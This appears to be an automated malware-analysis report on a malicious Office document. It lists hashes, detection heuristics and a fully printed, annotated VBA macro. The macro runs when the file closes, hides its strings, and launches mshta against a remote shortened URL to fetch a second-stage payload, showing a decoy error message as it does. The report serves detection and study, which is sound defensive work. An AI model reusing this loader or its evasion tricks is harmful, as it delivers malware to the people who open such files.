Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9e559f2b4636ff47…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 8.4 KB
First seen: 2021-06-13
MD5: b6fc9fd8b8beae8c0c4c962c54dd9eb9
SHA-1: 3a650e1a29b2d56a6615426e29ab1fd8515a6824
SHA-256: 9e559f2b4636ff47dc3dbd0ec75a6cdee5cadaa1ff3fd5cf252953bfc3ebc394
Risk score: 208

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The OOXML file contains a heavily obfuscated VBA macro whose entry point is the Auto_Close function. The macro assembles a URL, 'https://j.mp/adsfljsdahdvstarajraj', from single-character helper functions, uses GetObject to instantiate a COM object, and calls that object's ShellExecute method to launch the second-stage payload from the URL. The obfuscation and the use of the Auto_Close auto-exec trigger indicate a malicious intent to download and run arbitrary code.

Heuristics (6)

  • VBA project inside OOXML [medium; 5 related findings; OOXML_VBA]
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/villia.bin)
  • Obfuscated auto-exec VBA loader [critical; OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
      = _
      GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
      : MsgBox "Microsoft Office not Installed"
  • VBA project part renamed to evade filename detection [high; OOXML_VBA_PROJECT_RENAMED]
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call [high; OLE_VBA_GETOBJ]
    GetObject call
    Matched line in script:
      = _
      GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
      : MsgBox "Microsoft Office not Installed"
  • VBA p-code auto-exec with execution tokens [high; OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro [low; OLE_VBA_AUTOCLOSE]
    Auto_Close macro
    Matched line in script:
      Function _
      Auto_Close _
      () _

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 1104 bytes
  SHA-256: e22d4007949b8c7fca2429debefc5cd675efe02bffcc321fd4911cf6a95b58e5

Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "Module1"

' Each helper returns one fragment of the final strings; the fragments are
' concatenated at run time so that neither the executable name nor the URL
' appears literally in the macro source.
Function X() As String
    X = "M"
End Function
Function Y() As String
    Y = "s"
End Function
Function Z() As String
    Z = "H"
End Function
Function D() As String
    D = "T"
End Function
Function E() As String
    E = "a"
End Function
Function L() As String
    L = "p"
End Function
Function K() As String
    K = "j.mp/"
End Function
Function T() As String
    T = "adsfljsdahdvstarajraj"
End Function

' F() assembles the second-stage URL: "H" + "T" + "T" + "p" + "://" + "j.mp/" + ...
' = "HTTp://j.mp/adsfljsdahdvstarajraj"
Function F() As String
    F = "H" + D + D + L + "://" + K + T
End Function

' calccc() assembles the program name: "M" + "s" + "H" + "T" + "a" = "MsHTa" (mshta.exe)
Function calccc() As String
    calccc = X + Y + Z + D + E
End Function

' Auto-exec entry point: Office runs Auto_Close when the document is closed.
Function Auto_Close() As String
    ' StrReverse turns the stored string into the COM moniker
    ' "new:13709620-C279-11CE-A49E-444553540000", which instantiates the object
    ' by CLSID (Shell.Application) without CreateObject or the ProgID appearing in source.
    Set alsoasld = GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
    ' Decoy message shown to the user while the payload is launched.
    MsgBox "Microsoft Office not Installed"
    ' Equivalent to Shell.Application.ShellExecute "MsHTa", "HTTp://j.mp/adsfljsdahdvstarajraj"
    alsoasld.shellexecute calccc, F
End Function
Artifact 2
  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: ppt/villia.bin
  Size: 19456 bytes
  SHA-256: ba3a4fd41266112be0b6c42b1895e6324ed73904d07bb6608a1501e95faf59fe